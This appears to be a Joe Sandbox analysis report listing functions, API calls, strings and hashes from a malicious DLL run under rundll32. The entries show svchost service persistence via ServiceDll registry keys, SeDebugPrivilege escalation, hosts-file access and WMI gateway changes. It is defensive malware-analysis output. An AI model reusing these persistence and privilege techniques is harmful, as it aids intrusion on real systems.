                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 6f10a7fb5942bbca60558dcd1b8d21a04968260cf0da91b97d87524df02f376b
                                      • Instruction ID: f802966c49025ed24f5dfcae2a34028557c535da5cca920b77e83a15a8301d7e
                                      • Opcode Fuzzy Hash: 6f10a7fb5942bbca60558dcd1b8d21a04968260cf0da91b97d87524df02f376b
                                      • Instruction Fuzzy Hash: C0B092B08041219BE6028F608C8854636B4F30A2927008142F800C3269D734C1409B50
                                      Function 10001D50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E4D020), ref: 10001D66
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 7704f734579a44c24fc2d8682553fbb1bb896e7c5fedc15cd7cb79516a391f31
                                      • Instruction ID: 60874214be4d57f326dacb7e6344f8791809096cf298a624f2bb173eefc3e03f
                                      • Opcode Fuzzy Hash: 7704f734579a44c24fc2d8682553fbb1bb896e7c5fedc15cd7cb79516a391f31
                                      • Instruction Fuzzy Hash: 9DB092F48082208BE7118F60CCC840636F8E309241710C042F800C3268D630C1809B60
                                      Function 10001DE0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E4A008), ref: 10001DF6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 7415d86445ea757eda86d45ef76e75ba70a3b4dc527e37764ac3ce15c6c6f6b8
                                      • Instruction ID: 33e969e0cce234b8e2dc56f93697a814ecb1d2ff4abf69a4308ee9ff2ee69fd3
                                      • Opcode Fuzzy Hash: 7415d86445ea757eda86d45ef76e75ba70a3b4dc527e37764ac3ce15c6c6f6b8
                                      • Instruction Fuzzy Hash: EEB092B0804221AFE6018FA48C8844A36F4E309241300C016F811C3266D630C2809F10
                                      Function 10001ED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(02E44FE0), ref: 10001EE6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: a1cf710aa06efddbf5582b16c7a08f845a8a09f0093749ab9bf0b6c54297a50b
                                      • Instruction ID: 5cc36d7040b06f7588df96cbbe99990be96b5a8160bdef7ffb22b6720cd30e56
                                      • Opcode Fuzzy Hash: a1cf710aa06efddbf5582b16c7a08f845a8a09f0093749ab9bf0b6c54297a50b
                                      • Instruction Fuzzy Hash: 5EB092F4900220CBE702CFA0CCC840A37F4E309281310C002F800C3224DA30C084DB10
                                      Function 10005050 Relevance: 1.5, APIs: 1, Instructions: 4networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • gethostbyname.WS2_32(100199D8), ref: 10005055
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: gethostbyname
                                      • String ID:
                                      • API String ID: 930432418-0
                                      • Opcode ID: 5fd300ce534cf0c8e4c88e819e590fe2992713f024bae53166e521b5d0b5ec67
                                      • Instruction ID: 4d598b9766fe6ceed8e3f718e2d75ee1a402bc02d4500a7f172e39c4eafe6b48
                                      • Opcode Fuzzy Hash: 5fd300ce534cf0c8e4c88e819e590fe2992713f024bae53166e521b5d0b5ec67
                                      • Instruction Fuzzy Hash: E7A002B5A04210ABEE01DBA5CB8C90B77E8AB85705B008848F15DC2011C678D940DB11
                                      Function 10005180 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsA.SHLWAPI(774C8A60,100075DB,?,?,%s\lang.ini,C:\Users\user\Desktop), ref: 10005185
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      • Opcode ID: f971ba6882d4ca19cd20fd8b60212cd3edd8a8fe937c18e82f44fbfb101f1016
                                      • Instruction ID: 118c78c0c9695d8a551b4ba886d12ad375b1458bb0a4dea99dd650c7c563ecf2
                                      • Opcode Fuzzy Hash: f971ba6882d4ca19cd20fd8b60212cd3edd8a8fe937c18e82f44fbfb101f1016
                                      • Instruction Fuzzy Hash: 51A002B5A04210ABDE10DBA5CB8C80A77E8AB95701B048844F149C2011C678D880DB11
                                      Function 10005280 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDriveTypeA.KERNEL32(10019C34,1000B786,10019C34), ref: 10005285
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: DriveType
                                      • String ID:
                                      • API String ID: 338552980-0
                                      • Opcode ID: 87301e1af61e2e41f1f6383ad11ae2e1a279f747f4b669202c44d7fdfc61eaef
                                      • Instruction ID: a0a788f3a0a4ab41634461f5791a3083b2ff699e0ce9ca5fdf73c56e4fc6de61
                                      • Opcode Fuzzy Hash: 87301e1af61e2e41f1f6383ad11ae2e1a279f747f4b669202c44d7fdfc61eaef
                                      • Instruction Fuzzy Hash: C0A00275D08610ABDF00DBF4CA8C81A77F9AB89741B40C844F155D2110C634D840DF11
                                      Function 10005350 Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCloseKey.KERNEL32(100199D8,100077C6,?), ref: 10005355
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 789b69af8a6c9098e4647c1b3afcf07e56411a0a888967a2e99320c4219e37c5
                                      • Instruction ID: 9a5c7de402fddbdbfe160585b93185f668ef75bcfd4763a99ab0458e81967846
                                      • Opcode Fuzzy Hash: 789b69af8a6c9098e4647c1b3afcf07e56411a0a888967a2e99320c4219e37c5
                                      • Instruction Fuzzy Hash: 02A002B5A08610AFDF00DBA5CB8C80A7BF9AB85701B008844F149C2011C678D840DB11

                                      Non-executed Functions

                                      Function 10006240 Relevance: 63.5, APIs: 24, Strings: 12, Instructions: 473memorycomCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.COMBASE(00000000,00000000), ref: 1000627D
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000628E
                                      • CoCreateInstance.COMBASE(Function_000141D0,00000000,00000001,10014100,10019B34), ref: 100062AE
                                      • 6D262DD0.MFC42(0000000C), ref: 100062BA
                                      • SysAllocString.OLEAUT32(?), ref: 100062E1
                                      • CoSetProxyBlanket.COMBASE(6C0BC1CB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 10006368
                                      • wcscat.MSVCRT ref: 100063A3
                                      • 6D262DD0.MFC42(0000000C), ref: 100063AB
                                      • SysAllocString.OLEAUT32(iguration.Index=), ref: 100063D3
                                      • 6D262DD0.MFC42(0000000C), ref: 1000642F
                                      • VariantInit.OLEAUT32(ultIPGateway), ref: 10006512
                                      • VariantInit.OLEAUT32(SetGateways), ref: 10006519
                                      • VariantInit.OLEAUT32(tworkAdapterConfiguration.Index=), ref: 10006520
                                      • 6D262DD0.MFC42(0000000C), ref: 10006596
                                      • SysAllocString.OLEAUT32(79617765), ref: 100065BE
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 10006668
                                      • _strcmpi.MSVCRT ref: 10006685
                                      • 6D262DD0.MFC42(0000000C), ref: 100066B4
                                      • SysAllocString.OLEAUT32(654E5F32), ref: 100066DC
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 10006789
                                      • StrStrIA.SHLWAPI(1001A364,svchost.exe -k NetworkService), ref: 100067A9
                                      • VariantClear.OLEAUT32(ultIPGateway), ref: 100067D2
                                      • VariantClear.OLEAUT32(SetGateways), ref: 100067D9
                                      • CoUninitialize.OLE32 ref: 10006803
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262Variant$AllocString$Init$ClearDecrementInitializeInterlocked$BlanketCreateInstanceProxySecurityUninitialize_strcmpiwcscat
                                      • String ID: CommandLine$Name$ProcessID$SELECT * FROM $SetGateways$WQL$flushdns$svchost.exe$svchost.exe -k NetworkService$tworkAdapterConfiguration.Index=$ultIPGateway$wayCostMetric
                                      • API String ID: 2874424801-756481962
                                      • Opcode ID: 1bb00c3f93f4a7b639d82edecc7658e22878ec0fd9d7bca1c454a458c29ec668
                                      • Instruction ID: 1f835a4d0faa9fc020e65b56cf2e9a4dfb5885ebfc35db84a98710ed097cd709
                                      • Opcode Fuzzy Hash: 1bb00c3f93f4a7b639d82edecc7658e22878ec0fd9d7bca1c454a458c29ec668
                                      • Instruction Fuzzy Hash: 8D02A2B1504345AFE720DF64CC80A9EB7E9FB88394F108A2DF5999B280DB71DD44CB92
                                      Function 10008880 Relevance: 58.0, APIs: 24, Strings: 9, Instructions: 270serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,772EC650,00000000), ref: 10008927
                                      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10008966
                                      • GetLastError.KERNEL32 ref: 10008970
                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10008984
                                      Strings
                                      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 100089B7
                                      • %SystemRoot%\System32\svchost.exe -k , xrefs: 100088C5
                                      • RegSetValueEx(ServiceDll), xrefs: 10008A7F
                                      • RegSetValueEx(Svchost\krnlsrvc), xrefs: 10008B31
                                      • RegOpenKeyEx(Svchost), xrefs: 10008AF4
                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10008AAA
                                      • Description, xrefs: 100089EB
                                      • ServiceDll, xrefs: 10008A5D
                                      • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10008A0D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: OpenService$CreateErrorLastManager
                                      • String ID: %SystemRoot%\System32\svchost.exe -k $Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                      • API String ID: 2857751478-660433390
                                      • Opcode ID: 7bee34f355b2868c88db09174060a769cc1a21acf3b1f20f2e0e65ce036f74e8
                                      • Instruction ID: 80a349a1c7f2a3681a728849bd2a1506b88036c9e14b74da46397a96899aa474
                                      • Opcode Fuzzy Hash: 7bee34f355b2868c88db09174060a769cc1a21acf3b1f20f2e0e65ce036f74e8
                                      • Instruction Fuzzy Hash: 4E9193B1A00218ABEB15DB64CC45BEE77A9FB88750F118259FA05E72C0DBB4DE40CB61
                                      Function 100068C0 Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 94stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • 6D262DD0.MFC42(00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000,00000000), ref: 100068FA
                                      • 6D262DD0.MFC42(000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000,00000000), ref: 10006913
                                      • 6D262DD0.MFC42(00000000,000000FF,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,10006F52,00000000), ref: 1000692D
                                      • strrchr.MSVCRT ref: 1000693E
                                      • strncpy.MSVCRT ref: 10006955
                                      • strncpy.MSVCRT ref: 1000695F
                                      • GetSystemInfo.KERNEL32(GatewayCostMetric,?,?,?,?,?,?,00000000,10009DD0), ref: 10006969
                                      • GetCurrentProcess.KERNEL32(00000020,chOrder,?,?,?,?,?,?,00000000,10009DD0), ref: 1000698A
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00000000,10009DD0), ref: 10006991
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,10009DD0), ref: 100069A2
                                      • AdjustTokenPrivileges.ADVAPI32(00000000,00000000), ref: 100069D7
                                      • CloseHandle.KERNEL32(44746553), ref: 100069E2
                                      • sscanf.MSVCRT ref: 10006A0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                      • String ID: %[^$C:\Users\user\Desktop$GatewayCostMetric$SeDebugPrivilege$chOrder$etc\hosts
                                      • API String ID: 1467661837-3828570706
                                      • Opcode ID: c6ea22cdf2f45c65aded0bf148d4135de5c60637ac9b3aef5171a31b4b18fe73
                                      • Instruction ID: 8e8dcdebdd68835a8d22dd71999f00dbe430d832e2cb33c79149909b2ad15fb4
                                      • Opcode Fuzzy Hash: c6ea22cdf2f45c65aded0bf148d4135de5c60637ac9b3aef5171a31b4b18fe73
                                      • Instruction Fuzzy Hash: A1313BB4905321AFE310DF69CDC9A567BE8FB8E310F00851EFA4987261D7B9D485CB21
                                      Function 100103B0 Relevance: 16.4, APIs: 6, Strings: 3, Instructions: 619COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /$T$U
                                      • API String ID: 0-733984016
                                      • Opcode ID: 26c6bb479a735e41787d1c855f490b5051d387b0f4123a6ad5da299e4ffc3d58
                                      • Instruction ID: 0af6b09eb13da6613914ca18b4293f2e930e745bf8d0b97389fd89aabda86cff
                                      • Opcode Fuzzy Hash: 26c6bb479a735e41787d1c855f490b5051d387b0f4123a6ad5da299e4ffc3d58
                                      • Instruction Fuzzy Hash: BC22DF357083858BD714CE2898906AFBBE1EFC5350F14492EF9C58B382DAB5D989C792
                                      Function 10005A50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 136fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(?,?), ref: 10005AE3
                                      • wsprintfA.USER32 ref: 10005B25
                                      • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 10005BCA
                                      • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 10005BDD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$.$\*.*
                                      • API String ID: 180737720-2210278135
                                      • Opcode ID: fd0c06f5e656c0ca6a1207c5c9b4d901a9358243d8fd2179b47a31ede6763e51
                                      • Instruction ID: 41b8f4281efce6065b0411dfc6bcae962f58c9dcddea6dda85180880c775b3fd
                                      • Opcode Fuzzy Hash: fd0c06f5e656c0ca6a1207c5c9b4d901a9358243d8fd2179b47a31ede6763e51
                                      • Instruction Fuzzy Hash: BA41E5721083446BD329CA78DC44AABB7D9FBC8350F444F1DF59A93281DBB5EA08CB52
                                      Function 10007420 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Versionsprintf
                                      • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                      • API String ID: 1728264858-2264339393
                                      • Opcode ID: 4f04bac56193650fc19eb336d9672af16f67b333fc106226f85362a7a82feba5
                                      • Instruction ID: 8d9624ca7b0e334ee449c93b415b4ae454ddf9d58a1d32c6b67a005c4f57db36
                                      • Opcode Fuzzy Hash: 4f04bac56193650fc19eb336d9672af16f67b333fc106226f85362a7a82feba5
                                      • Instruction Fuzzy Hash: D531D531A047445BE724C524C891A9BB7D6F7C4360F918A2DEE5AC7385DAB8DD098642
                                      Function 10010050 Relevance: 3.1, APIs: 2, Instructions: 55timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?), ref: 10010085
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 10010095
                                        • Part of subcall function 1000F760: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?), ref: 1000F76D
                                        • Part of subcall function 1000F730: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000F74C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: ed7d6a687863316638af9b4b05be9f9b42821b15d02c911e347a352490ce8edc
                                      • Instruction ID: df2849aa1dc12c0f5487544b9b495675c1762f2cfe66b261c015e5e036936da4
                                      • Opcode Fuzzy Hash: ed7d6a687863316638af9b4b05be9f9b42821b15d02c911e347a352490ce8edc
                                      • Instruction Fuzzy Hash: 0821B2B5914B419FD364CF69C881A67BBE4FB88604F008E2EE5DAC3611E774E509CB52
                                      Function 1000EED0 Relevance: 2.9, Strings: 2, Instructions: 405COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: K$P
                                      • API String ID: 0-420285281
                                      • Opcode ID: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                      • Instruction ID: 98d1436c1d12383d330a33e8837fd7373f2bd8dcf5064c5ac92bb59d1160ce8b
                                      • Opcode Fuzzy Hash: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                      • Instruction Fuzzy Hash: 8AD18D30119381AFD621CB698CC0EABFBF9AFDAB00F444D0DF6D583291D6A1E5498762
                                      Function 1000EAE0 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
